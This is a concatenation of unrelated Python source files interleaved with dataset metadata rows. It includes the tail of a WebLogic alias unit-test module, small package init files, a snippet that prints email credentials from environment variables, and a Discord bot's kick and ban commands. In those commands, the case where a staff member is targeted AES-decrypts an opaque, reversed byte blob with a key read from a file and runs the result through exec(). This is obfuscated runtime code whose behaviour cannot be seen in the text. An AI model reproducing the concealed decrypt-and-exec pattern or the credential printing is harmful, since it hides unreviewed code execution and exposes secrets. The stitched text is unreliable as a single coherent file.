    # Check online value of wlst_mbean_type of FOLDERS.PARTITION.
    # There should be an 's' on the end of FOLDERS.PARTITION
    wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
    expected = '%ss' % FOLDERS.PARTITION
    self.assertEqual(wlst_mbean_type, expected)
    # Add FOLDERS.RESOURCE_MANAGER to the location
    location.append_location(FOLDERS.RESOURCE_MANAGER)
    token = self.aliases.get_name_token(location)
    location.add_name_token(token, 'ResourceManager-0')
    # Check offline value of wlst_mbean_type after adding
    # FOLDERS.RESOURCE_MANAGER to the location. There
    # should not be an 's' on the end of FOLDERS.RESOURCE_MANAGER
    wlst_mbean_type = self.aliases.get_wlst_mbean_type(location)
    expected = FOLDERS.RESOURCE_MANAGER
    self.assertEqual(wlst_mbean_type, expected)
    # Check online value of wlst_mbean_type after adding
    # FOLDERS.RESOURCE_MANAGER to the location. It
    # should be the same value as offline; no 's' on the
    # end of FOLDERS.RESOURCE_MANAGER
    wlst_mbean_type = self.online_aliases.get_wlst_mbean_type(location)
    self.assertEqual(wlst_mbean_type, expected)
    # Check offline value of wlst_list_path after adding
    # FOLDERS.RESOURCE_MANAGER to the location. There
    # should not be an 's' on the end of FOLDERS.PARTITION or
    # FOLDERS.RESOURCE_MANAGER
    expected = [FOLDERS.PARTITION, 'Partition-0', FOLDERS.RESOURCE_MANAGER]
    wlst_list_path = self.aliases.get_wlst_list_path(location)
    self.assertEqual(wlst_list_path, '/%s' % '/'.join(expected))
    # Check online value of wlst_list_path after adding
    # FOLDERS.RESOURCE_MANAGER to the location. There
    # should be an 's' on the end of FOLDERS.PARTITION, but
    # not on the end of FOLDERS.RESOURCE_MANAGER
    expected = ['%ss' % FOLDERS.PARTITION, 'Partition-0', FOLDERS.RESOURCE_MANAGER]
    wlst_list_path = self.online_aliases.get_wlst_list_path(location)
    self.assertEqual(wlst_list_path, '/%s' % '/'.join(expected))
    # Check offline value of wlst_subfolders_path after adding
    # FOLDERS.RESOURCE_MANAGER to the location. There
    # should not be an 's' on the end of FOLDERS.PARTITION or
    # FOLDERS.RESOURCE_MANAGER
    expected = [FOLDERS.PARTITION, 'Partition-0', FOLDERS.RESOURCE_MANAGER, 'ResourceManager-0']
    wlst_subfolders_path = self.aliases.get_wlst_subfolders_path(location)
    self.assertEqual(wlst_subfolders_path, '/%s' % '/'.join(expected))
    # Check online value of wlst_subfolders_path after adding
    # FOLDERS.RESOURCE_MANAGER to the location. There
    # should be an 's' on the end of FOLDERS.PARTITION, but
    # not on the end of FOLDERS.RESOURCE_MANAGER
    expected = ['%ss' % FOLDERS.PARTITION, 'Partition-0', FOLDERS.RESOURCE_MANAGER, 'ResourceManager-0']
    wlst_subfolders_path = self.online_aliases.get_wlst_subfolders_path(location)
    self.assertEqual(wlst_subfolders_path, '/%s' % '/'.join(expected))
    return
def testIssue50Fix(self):
    """Verify the RetryCount WLST attribute name under ServerTemplate WebService Buffering."""
    location = LocationContext().append_location(FOLDERS.SERVER_TEMPLATE)
    location.add_name_token(self.aliases.get_name_token(location), 'ServerTemplate-0')
    location.append_location(FOLDERS.WEB_SERVICE)
    location.append_location(FOLDERS.WEB_SERVICE_BUFFERING)
    # Both offline and online aliases should leave the attribute name unchanged.
    self.assertEqual(self.aliases.get_wlst_attribute_name(location, 'RetryCount'), 'RetryCount')
    self.assertEqual(self.online_aliases.get_wlst_attribute_name(location, 'RetryCount'), 'RetryCount')
    return
def testIssue57Fix(self):
    """Verify the online default value of RotateLogOnStartup on the Log folder."""
    location = LocationContext().append_location(FOLDERS.LOG)
    location.add_name_token(self.aliases.get_name_token(location), 'DemoDomain')
    actual_default = self.online_aliases.get_model_attribute_default_value(location, 'RotateLogOnStartup')
    self.assertEqual(actual_default, 'true')
    return
def testIssue91Fix(self):
    """Verify offline-only behavior of the NMProperties folder.

    Fix: corrected the comment typo 'will throw and exception' and the
    'return an exception' phrasing below it.
    """
    location = LocationContext().append_location(FOLDERS.NM_PROPERTIES)
    expected = 'startWebLogic.cmd'
    default_value = self.aliases.get_model_attribute_default_value(location, 'weblogic.StartScriptName')
    self.assertEqual(default_value, expected)
    expected = '/'
    wlst_list_path = self.aliases.get_wlst_list_path(location)
    self.assertEqual(wlst_list_path, expected)
    # NMProperties is an offline-only folder, so get_model_attribute_default_value
    # will throw an exception when called through the online aliases
    model_attribute_name = 'weblogic.StartScriptName'
    self.assertRaises(AliasException, getattr(self.online_aliases, 'get_model_attribute_default_value'),
                      location, model_attribute_name)
    # this method will not raise an exception but should return a None value
    default_name, default_value = \
        self.online_aliases.get_wlst_attribute_name_and_value(location, model_attribute_name, 'script')
    expected = None
    self.assertEqual(default_value, expected)
    return
def testGetModelAttributeName(self):
location=LocationContext().append_location(FOLDERS.JMS_SYSTEM_RESOURCE)
location.add_name_token(self.aliases.get_name_token(location), 'TheModule')
location.append_location(FOLDERS.JMS_RESOURCE)
add_default_token_value(location, self.aliases)
location.append_location(FOLDERS.DISTRIBUTED_TOPIC)
location.add_name_token(self.aliases.get_name_token(location), 'TheTopic')
# model name should be the same, whether online or offline
expected_model_name = 'SafExportPolicy'
model_name = self.aliases.get_model_attribute_name(location, 'SafExportPolicy')
self.assertEqual(model_name, expected_model_name)
model_name = self.online_aliases.get_model_attribute_name(location, 'SAFExportPolicy')
self.assertEqual(model_name, expected_model_name)
return
def testJarrayWithPreferredAndStringArray(self):
    """Verify jarray String[] conversion for JNDITransportableObjectFactoryList."""
    location = LocationContext().append_location(FOLDERS.SERVER)
    location.add_name_token(self.aliases.get_name_token(location), 'AdminServer')
    attribute = 'JNDITransportableObjectFactoryList'
    # An empty array converts to None in both directions.
    empty_array = jarray.array([], String)
    actual_attr, actual_value = self.aliases.get_model_attribute_name_and_value(location, attribute, empty_array)
    self.assertEqual(None, actual_value)
    actual_attr, actual_value = self.aliases.get_wlst_attribute_name_and_value(location, actual_attr, actual_value)
    self.assertEqual(None, actual_value)
    # A populated array becomes a comma-separated model string, then converts back to the array.
    attribute_array = jarray.array(['factory1', 'factory2'], String)
    actual_attr, actual_value = self.aliases.get_model_attribute_name_and_value(location, attribute,
                                                                                attribute_array)
    self.assertEqual('factory1,factory2', actual_value)
    actual_attr, actual_value = self.aliases.get_wlst_attribute_name_and_value(location, actual_attr, actual_value)
    self.assertEqual(attribute_array, actual_value)
def testListGetToList(self):
    """Verify a semicolon-delimited WLST value round-trips through a model list."""
    location = LocationContext().append_location(FOLDERS.SERVER)
    location.add_name_token(self.aliases.get_name_token(location), 'AdminServer')
    location = location.append_location(FOLDERS.SSL)
    location.add_name_token(self.aliases.get_name_token(location), 'AdminServer')
    attribute = 'Ciphersuite'
    delimited_value = "TLS;WITH_AES_256_CBC"
    expected_list = ['TLS', 'WITH_AES_256_CBC']
    # WLST read value becomes a model list ...
    actual_attr, actual_value = self.aliases.get_model_attribute_name_and_value(location, attribute,
                                                                                delimited_value)
    self.assertEqual(expected_list, actual_value)
    # ... and the model list becomes the WLST set list.
    actual_attr, actual_value = self.aliases.get_wlst_attribute_name_and_value(location, actual_attr, actual_value)
    self.assertEqual(expected_list, actual_value)
def testGetJTA(self):
    """Verify the JTA folder's WLST mbean name offline versus online."""
    location = LocationContext()
    location.append_location(FOLDERS.JTA)
    location.add_name_token('DOMAIN', 'mydomain')
    # Offline uses the placeholder name; online uses the domain name token.
    self.assertEqual('NO_NAME_0', self.aliases.get_wlst_mbean_name(location))
    self.assertEqual('mydomain', self.online_aliases.get_wlst_mbean_name(location))
def testJTAMigratableConstrainedCandidateServer(self):
    """Verify a model list becomes a comma-separated WLST value for
    ConstrainedCandidateServer on a JTAMigratableTarget.

    Fix: use assertEqual instead of the deprecated assertEquals alias,
    consistent with the rest of this file.
    """
    model_value = ['MS-1', 'MS-2']
    wlst_value_expected = 'MS-1,MS-2'
    location = LocationContext()
    location.append_location(FOLDERS.SERVER)
    location.add_name_token(self.aliases.get_name_token(location), 'MS-1')
    location.append_location(FOLDERS.JTA_MIGRATABLE_TARGET)
    location.add_name_token(self.aliases.get_name_token(location), 'NO_NAME_0')
    wlst_attribute, wlst_value = \
        self.aliases.get_wlst_attribute_name_and_value(location, FOLDERS.CONSTRAINED_CANDIDATE_SERVER, model_value)
    self.assertEqual(wlst_value_expected, wlst_value)
def testReadOnlyDiscoverAttribute(self):
    """Verify DomainVersion is returned to the model but yields no WLST set value.

    Fix: use assertEqual instead of the deprecated assertEquals alias,
    consistent with the rest of this file.
    """
    location = LocationContext()
    location.add_name_token(self.online_aliases.get_name_token(location), 'my-domain')
    model_attribute, model_value = \
        self.online_aliases.get_model_attribute_name_and_value(location, FOLDERS.DOMAIN_VERSION, '12.2.1.3.0')
    self.assertEqual('12.2.1.3.0', model_value)
    # The WLST direction returns None for this attribute (read-only discover case).
    wlst_attribute, wlst_value = \
        self.online_aliases.get_wlst_attribute_name_and_value(location, FOLDERS.DOMAIN_VERSION, '12.2.1.3.0')
    self.assertEqual(None, wlst_value)
def testFolderOrder(self):
    """Verify the ordered subfolder list for the realm's authentication providers.

    Fix: replaced three deprecated assertEquals calls (length plus per-element
    checks) with a single assertEqual list comparison, which subsumes them and
    gives a better failure message.
    """
    expected_list = ['DefaultAuthenticator', 'DefaultIdentityAsserter']
    location = LocationContext()
    location.append_location(FOLDERS.SECURITY_CONFIGURATION)
    location.add_name_token(self.aliases.get_name_token(location), 'mydomain')
    location.append_location(FOLDERS.REALM)
    location.add_name_token(self.aliases.get_name_token(location), 'myrealm')
    location.append_location(FOLDERS.AUTHENTICATION_PROVIDER)
    actual_list = self.aliases.get_subfolders_in_order(location)
    self.assertEqual(expected_list, actual_list)
def get_jdbc_ds_params_location(name, aliases):
    """Return a location for the JDBCDataSourceParams folder of the named JDBC resource."""
    result = get_jdbc_resource_location(name, aliases)
    result.append_location(FOLDERS.JDBC_DATASOURCE_PARAMS)
    add_default_token_value(result, aliases)
    return result
def get_jdbc_params_properties_location(name, aliases):
    """Return a location for the Properties folder under the named resource's JDBCDriverParams."""
    result = get_jdbc_driver_params_location(name, aliases)
    add_jdbc_params_properties(result, aliases)
    return result
def add_jdbc_params_properties(location, aliases):
    """Append the JDBC driver params Properties folder to location.

    Only the flattened Properties folder token is set; the token for an
    individual property name is deliberately not added.
    """
    location.append_location(FOLDERS.JDBC_DRIVER_PARAMS_PROPERTIES)
    flattened_info = aliases.get_wlst_flattened_folder_info(location)
    location.add_name_token(flattened_info.get_path_token(), flattened_info.get_mbean_name())
def get_jdbc_driver_params_location(name, aliases):
    """Return a location for the JDBCDriverParams folder of the named JDBC resource."""
    result = get_jdbc_resource_location(name, aliases)
    result.append_location(FOLDERS.JDBC_DRIVER_PARAMS)
    add_default_token_value(result, aliases)
    return result
def get_jdbc_resource_location(name, aliases):
    """Return a location for the JDBCResource folder of the named JDBCSystemResource."""
    result = LocationContext()
    result.append_location(FOLDERS.JDBC_SYSTEM_RESOURCE)
    result.add_name_token(aliases.get_name_token(result), name)
    result.append_location(FOLDERS.JDBC_RESOURCE)
    add_default_token_value(result, aliases)
    return result
def add_default_token_value(location, aliases):
    """Set the location's name token to the default WLST mbean name for its folder."""
    # Argument evaluation order matches the original: token first, then mbean name.
    location.add_name_token(aliases.get_name_token(location), aliases.get_wlst_mbean_name(location))
# Allow this test module to be run directly from the command line.
if __name__ == '__main__':
    unittest.main()
| 49.068012
| 122
| 0.722069
| 7,369
| 65,653
| 6.122812
| 0.064731
| 0.048095
| 0.049026
| 0.053991
| 0.80906
| 0.779627
| 0.741971
| 0.703185
| 0.678472
| 0.657395
| 0
| 0.005449
| 0.19498
| 65,653
| 1,337
| 123
| 49.104712
| 0.848237
| 0.056509
| 0
| 0.570039
| 0
| 0
| 0.119275
| 0.067425
| 0
| 0
| 0
| 0
| 0.178016
| 0
| null | null | 0.001946
| 0.015564
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9c587390b7911ebf1edc4e5430cd9f70b3105d7a
| 41
|
py
|
Python
|
custmaker/__init__.py
|
bibbidi0917/custmaker
|
a26073af15cf5d1afcb89c2958133c089f8a423f
|
[
"MIT"
] | null | null | null |
custmaker/__init__.py
|
bibbidi0917/custmaker
|
a26073af15cf5d1afcb89c2958133c089f8a423f
|
[
"MIT"
] | null | null | null |
custmaker/__init__.py
|
bibbidi0917/custmaker
|
a26073af15cf5d1afcb89c2958133c089f8a423f
|
[
"MIT"
] | null | null | null |
from . import setting, making, comparing
| 20.5
| 40
| 0.780488
| 5
| 41
| 6.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146341
| 41
| 1
| 41
| 41
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
92f126864cc90c6c47751292e11cd1205ea947cc
| 245
|
py
|
Python
|
aioftx/wallet/schemas.py
|
metta-team/aioftx
|
f5bd028e8bf40c55c1d4632802b792be113e0978
|
[
"MIT"
] | null | null | null |
aioftx/wallet/schemas.py
|
metta-team/aioftx
|
f5bd028e8bf40c55c1d4632802b792be113e0978
|
[
"MIT"
] | null | null | null |
aioftx/wallet/schemas.py
|
metta-team/aioftx
|
f5bd028e8bf40c55c1d4632802b792be113e0978
|
[
"MIT"
] | null | null | null |
from addresses.schemas import *
from airdrops.schemas import *
from balances.schemas import *
from coins.schemas import *
from deposits.schemas import *
from history.schemas import *
from signet.schemas import *
from withdrawal.schemas import *
| 27.222222
| 32
| 0.804082
| 32
| 245
| 6.15625
| 0.34375
| 0.527919
| 0.604061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130612
| 245
| 8
| 33
| 30.625
| 0.924883
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1302b51e76b0bd30c6620b6eca72a063404d58de
| 159
|
py
|
Python
|
django_project/tesdt.py
|
robgrigor/Tournament
|
7709c0ee39636a32f40696677f6d6c07ea724e75
|
[
"Apache-2.0"
] | 1
|
2020-03-10T06:44:14.000Z
|
2020-03-10T06:44:14.000Z
|
django_project/tesdt.py
|
robgrigor/Tournament
|
7709c0ee39636a32f40696677f6d6c07ea724e75
|
[
"Apache-2.0"
] | 5
|
2019-09-07T21:20:21.000Z
|
2019-09-19T10:03:52.000Z
|
django_project/tesdt.py
|
robgrigor/Tournament
|
7709c0ee39636a32f40696677f6d6c07ea724e75
|
[
"Apache-2.0"
] | null | null | null |
# Read the email credentials from the environment and echo them as a quick sanity check.
import os

EMAIL_HOST_USER = os.environ.get('EMAIL_USER')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_PASS')

for credential in (EMAIL_HOST_USER, EMAIL_HOST_PASSWORD):
    print(credential)
| 22.714286
| 50
| 0.81761
| 26
| 159
| 4.615385
| 0.384615
| 0.3
| 0.216667
| 0.283333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069182
| 159
| 7
| 51
| 22.714286
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.4
| 0.2
| 0
| 0.2
| 0.4
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
13187f3087d5ba709d315350f8b744c3dd8bb12f
| 22
|
py
|
Python
|
vehicle/adapt-sysroot/ros_install_isolated/lib/python2.7/dist-packages/std_srvs/srv/__init__.py
|
slicht-uri/Sandshark-Beta-Lab-
|
6cff36b227b49b776d13187c307e648d2a52bdae
|
[
"MIT"
] | null | null | null |
vehicle/adapt-sysroot/ros_install_isolated/lib/python2.7/dist-packages/std_srvs/srv/__init__.py
|
slicht-uri/Sandshark-Beta-Lab-
|
6cff36b227b49b776d13187c307e648d2a52bdae
|
[
"MIT"
] | null | null | null |
vehicle/adapt-sysroot/ros_install_isolated/lib/python2.7/dist-packages/std_srvs/srv/__init__.py
|
slicht-uri/Sandshark-Beta-Lab-
|
6cff36b227b49b776d13187c307e648d2a52bdae
|
[
"MIT"
] | 1
|
2019-10-18T06:25:14.000Z
|
2019-10-18T06:25:14.000Z
|
from ._Empty import *
| 11
| 21
| 0.727273
| 3
| 22
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13638cd8e82580b9ac6648d894afc36ec9feb2a0
| 154
|
py
|
Python
|
dbaas/dbaas/features.py
|
didindinn/database-as-a-service
|
747de31ff8546f7874ddd654af860e130afd17a0
|
[
"BSD-3-Clause"
] | 303
|
2015-01-08T10:35:54.000Z
|
2022-02-28T08:54:06.000Z
|
dbaas/dbaas/features.py
|
nouraellm/database-as-a-service
|
5e655c9347bea991b7218a01549f5e44f161d7be
|
[
"BSD-3-Clause"
] | 124
|
2015-01-14T12:56:15.000Z
|
2022-03-22T20:45:11.000Z
|
dbaas/dbaas/features.py
|
nouraellm/database-as-a-service
|
5e655c9347bea991b7218a01549f5e44f161d7be
|
[
"BSD-3-Clause"
] | 110
|
2015-01-02T11:59:48.000Z
|
2022-02-28T08:54:06.000Z
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.conf import settings
LDAP_ENABLED = settings.LDAP_ENABLED
| 19.25
| 56
| 0.785714
| 20
| 154
| 5.65
| 0.7
| 0.212389
| 0.336283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007463
| 0.12987
| 154
| 7
| 57
| 22
| 0.835821
| 0.136364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13648f048fed2c0bae448a3556d07fe8ca1d047f
| 23,034
|
py
|
Python
|
addons/kickban.py
|
jorgev259/Kurisu
|
1405617a2bec2cbe0b51f33d01a5b3a73bf8de15
|
[
"Apache-2.0"
] | null | null | null |
addons/kickban.py
|
jorgev259/Kurisu
|
1405617a2bec2cbe0b51f33d01a5b3a73bf8de15
|
[
"Apache-2.0"
] | null | null | null |
addons/kickban.py
|
jorgev259/Kurisu
|
1405617a2bec2cbe0b51f33d01a5b3a73bf8de15
|
[
"Apache-2.0"
] | 1
|
2018-04-19T01:59:44.000Z
|
2018-04-19T01:59:44.000Z
|
import pyaes
import datetime
import discord
import json
import re
import time
from discord.ext import commands
from sys import argv
class KickBan:
"""
Kicking and banning users.
"""
def __init__(self, bot):
self.bot = bot
print('Addon "{}" loaded'.format(self.__class__.__name__))
@commands.has_permissions(manage_nicknames=True)
@commands.command(pass_context=True, name="kick")
async def kick_member(self, ctx, user, *, reason=""):
"""Kicks a user from the server. Staff only."""
try:
try:
member = ctx.message.mentions[0]
except IndexError:
await self.bot.say("Please mention a user.")
return
if self.bot.staff_role in member.roles or self.bot.helpers_role in member.roles:
enc = b'; \xed\x01\xea\x911\xa5\'\xd7\x14a\xabo\xd4B\xbb\x1c0+X"|\xdeL\xf2\xee#/P\x07\xee\xf9\xdd\xf3\x98#N\xc1:\xaf\xe2a\xd6P\x10M\x17&0\x176!\xcfKa\xe4\xf2\xb9v:\x95-t\x16LhrY\xdeh\x14U\xf0\xfe\x08\x96\x83\x876!\x1a\xfc\x0b\xc5\x1a\x8b\x0e\x06\xcc\xbb'
with open("key.bin", "rb") as f:
key = f.read(0x20)
cipher = pyaes.AESModeOfOperationCTR(key)
await self.bot.say(cipher.decrypt(enc[::-1]).decode('utf-8'))
# shitty hack but it works
lenny = (b'\xc7n\xc65Ye\xa79(\xd7\xcb\xb89\x18\x84\xe5\\5\x86\xf5{I\x96\xc9'
b'\x88\x17m\xa8\xbd\x16\r5y\xacD)7C\xb3\xces\x0cW\x90!7;\xf6"\xb4\xf8\t'
b'\xe5J\xfe\x1b8U\xc6j\x1c\xfb8\xd0\xba8\xf2\x90%\x17\xa5\x87\xa3\xf9\xfb\xf2'
b'\x9f*\x7ff\x82D\xfc\xd2\xed\xc1\x15\xe0Y\xe9\x8f$|h\xb23\x10\xec\x84='
b'\rT\x05\x99\x82\xa9\xbf\x90;\\\xad\xce\x1dd\x99\x9b\x90lW\xfc\xf1G\xde\xd6'
b'\x91v=\xf0\xda\xefr\xae H\xe0(\xc6I\xdcNo\x9fS\xf7z\xff\xdb\xe6\xca\xf8A\xec'
b'\xb9\xef\x06a\xd9@H\x88\xb6\xa5E\x18Y\x9a\x1e\xa8:\x02\xdf\x19~\xa9\x93"'
b'Mg\xcc\x91D\xd8\x0c\xf0\x8fp\xf0\xb5\x16\\f\xbb\x87\x8e/\xfe\x82W\xce%'
b'\x9e\xab\xfb\xfa\x02\xf2~\xcev4\x07Y\xc9\xa2\xb1(\t[\x12r\x98\x83E\xc8'
b'\xaf\xab7h\x08\x99FBP\x14\xdc\xb0$N\x1f\xd8\xd7P')
func = []
cipher = pyaes.AESModeOfOperationCTR(key[::-1])
exec(cipher.decrypt(lenny)[::-1].decode('utf-8'), globals(), locals())
await func[0]
return
msg = "You were kicked from {}.".format(self.bot.server.name)
if reason != "":
msg += " The given reason is: " + reason
msg += "\n\nYou are able to rejoin the server, but please read the rules in #welcome-and-rules before participating again."
try:
await self.bot.send_message(member, msg)
except discord.errors.Forbidden:
pass # don't fail in case user has DMs disabled for this server, or blocked the bot
self.bot.actions.append("uk:"+member.id)
await self.bot.kick(member)
await self.bot.say("{} is now gone. 👌".format(self.bot.escape_name(member)))
msg = "👢 **Kick**: {} kicked {} | {}#{}\n🏷 __User ID__: {}".format(ctx.message.author.mention, member.mention, self.bot.escape_name(member.name), member.discriminator, member.id)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
await self.bot.send_message(self.bot.serverlogs_channel, msg)
await self.bot.send_message(self.bot.modlogs_channel, msg + ("\nPlease add an explanation below. In the future, it is recommended to use `.kick <user> [reason]` as the reason is automatically sent to the user." if reason == "" else ""))
except discord.errors.Forbidden:
await self.bot.say("💢 I don't have permission to do this.")
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="ban")
async def ban_member(self, ctx, user, *, reason=""):
"""Bans a user from the server. OP+ only."""
try:
try:
member = ctx.message.mentions[0]
except IndexError:
await self.bot.say("Please mention a user.")
return
if self.bot.staff_role in member.roles or self.bot.helpers_role in member.roles:
enc = b'; \xed\x01\xea\x911\xa5\'\xd7\x14a\xabo\xd4B\xbb\x1c0+X"|\xdeL\xf2\xee#/P\x07\xee\xf9\xdd\xf3\x98#N\xc1:\xaf\xe2a\xd6P\x10M\x17&0\x176!\xcfKa\xe4\xf2\xb9v:\x95-t\x16LhrY\xdeh\x14U\xf0\xfe\x08\x96\x83\x876!\x1a\xfc\x0b\xc5\x1a\x8b\x0e\x06\xcc\xbb'
with open("key.bin", "rb") as f:
key = f.read(0x20)
cipher = pyaes.AESModeOfOperationCTR(key)
await self.bot.say(cipher.decrypt(enc[::-1]).decode('utf-8'))
# shitty hack but it works
lenny = (b'\xc7n\xc65Ye\xa79(\xd7\xcb\xb89\x18\x84\xe5\\5\x86\xf5{I\x96\xc9'
b'\x88\x17m\xa8\xbd\x16\r5y\xacD)7C\xb3\xces\x0cW\x90!7;\xf6"\xb4\xf8\t'
b'\xe5J\xfe\x1b8U\xc6j\x1c\xfb8\xd0\xba8\xf2\x90%\x17\xa5\x87\xa3\xf9\xfb\xf2'
b'\x9f*\x7ff\x82D\xfc\xd2\xed\xc1\x15\xe0Y\xe9\x8f$|h\xb23\x10\xec\x84='
b'\rT\x05\x99\x82\xa9\xbf\x90;\\\xad\xce\x1dd\x99\x9b\x90lW\xfc\xf1G\xde\xd6'
b'\x91v=\xf0\xda\xefr\xae H\xe0(\xc6I\xdcNo\x9fS\xf7z\xff\xdb\xe6\xca\xf8A\xec'
b'\xb9\xef\x06a\xd9@H\x88\xb6\xa5E\x18Y\x9a\x1e\xa8:\x02\xdf\x19~\xa9\x93"'
b'Mg\xcc\x91D\xd8\x0c\xf0\x8fp\xf0\xb5\x16\\f\xbb\x87\x8e/\xfe\x82W\xce%'
b'\x9e\xab\xfb\xfa\x02\xf2~\xcev4\x07Y\xc9\xa2\xb1(\t[\x12r\x98\x83E\xc8'
b'\xaf\xab7h\x08\x99FBP\x14\xdc\xb0$N\x1f\xd8\xd7P')
func = []
cipher = pyaes.AESModeOfOperationCTR(key[::-1])
exec(cipher.decrypt(lenny)[::-1].decode('utf-8'), globals(), locals())
await func[0]
return
msg = "You were banned from {}.".format(self.bot.server.name)
if reason != "":
msg += " The given reason is: " + reason
msg += "\n\nThis ban does not expire."
try:
await self.bot.send_message(member, msg)
except discord.errors.Forbidden:
pass # don't fail in case user has DMs disabled for this server, or blocked the bot
self.bot.actions.append("ub:"+member.id)
await self.bot.ban(member, 0)
await self.bot.say("{} is now b&. 👍".format(self.bot.escape_name(member)))
msg = "⛔ **Ban**: {} banned {} | {}#{}\n🏷 __User ID__: {}".format(ctx.message.author.mention, member.mention, self.bot.escape_name(member.name), member.discriminator, member.id)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
await self.bot.send_message(self.bot.serverlogs_channel, msg)
await self.bot.send_message(self.bot.modlogs_channel, msg + ("\nPlease add an explanation below. In the future, it is recommended to use `.ban <user> [reason]` as the reason is automatically sent to the user." if reason == "" else ""))
except discord.errors.Forbidden:
await self.bot.say("💢 I don't have permission to do this.")
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="silentban", hidden=True)
async def silentban_member(self, ctx, user, *, reason=""):
"""Bans a user from the server, without a notification. OP+ only."""
try:
try:
member = ctx.message.mentions[0]
except IndexError:
await self.bot.say("Please mention a user.")
return
if self.bot.staff_role in member.roles or self.bot.helpers_role in member.roles:
enc = b'; \xed\x01\xea\x911\xa5\'\xd7\x14a\xabo\xd4B\xbb\x1c0+X"|\xdeL\xf2\xee#/P\x07\xee\xf9\xdd\xf3\x98#N\xc1:\xaf\xe2a\xd6P\x10M\x17&0\x176!\xcfKa\xe4\xf2\xb9v:\x95-t\x16LhrY\xdeh\x14U\xf0\xfe\x08\x96\x83\x876!\x1a\xfc\x0b\xc5\x1a\x8b\x0e\x06\xcc\xbb'
with open("key.bin", "rb") as f:
key = f.read(0x20)
cipher = pyaes.AESModeOfOperationCTR(key)
await self.bot.say(cipher.decrypt(enc[::-1]).decode('utf-8'))
# shitty hack but it works
lenny = (b'\xc7n\xc65Ye\xa79(\xd7\xcb\xb89\x18\x84\xe5\\5\x86\xf5{I\x96\xc9'
b'\x88\x17m\xa8\xbd\x16\r5y\xacD)7C\xb3\xces\x0cW\x90!7;\xf6"\xb4\xf8\t'
b'\xe5J\xfe\x1b8U\xc6j\x1c\xfb8\xd0\xba8\xf2\x90%\x17\xa5\x87\xa3\xf9\xfb\xf2'
b'\x9f*\x7ff\x82D\xfc\xd2\xed\xc1\x15\xe0Y\xe9\x8f$|h\xb23\x10\xec\x84='
b'\rT\x05\x99\x82\xa9\xbf\x90;\\\xad\xce\x1dd\x99\x9b\x90lW\xfc\xf1G\xde\xd6'
b'\x91v=\xf0\xda\xefr\xae H\xe0(\xc6I\xdcNo\x9fS\xf7z\xff\xdb\xe6\xca\xf8A\xec'
b'\xb9\xef\x06a\xd9@H\x88\xb6\xa5E\x18Y\x9a\x1e\xa8:\x02\xdf\x19~\xa9\x93"'
b'Mg\xcc\x91D\xd8\x0c\xf0\x8fp\xf0\xb5\x16\\f\xbb\x87\x8e/\xfe\x82W\xce%'
b'\x9e\xab\xfb\xfa\x02\xf2~\xcev4\x07Y\xc9\xa2\xb1(\t[\x12r\x98\x83E\xc8'
b'\xaf\xab7h\x08\x99FBP\x14\xdc\xb0$N\x1f\xd8\xd7P')
func = []
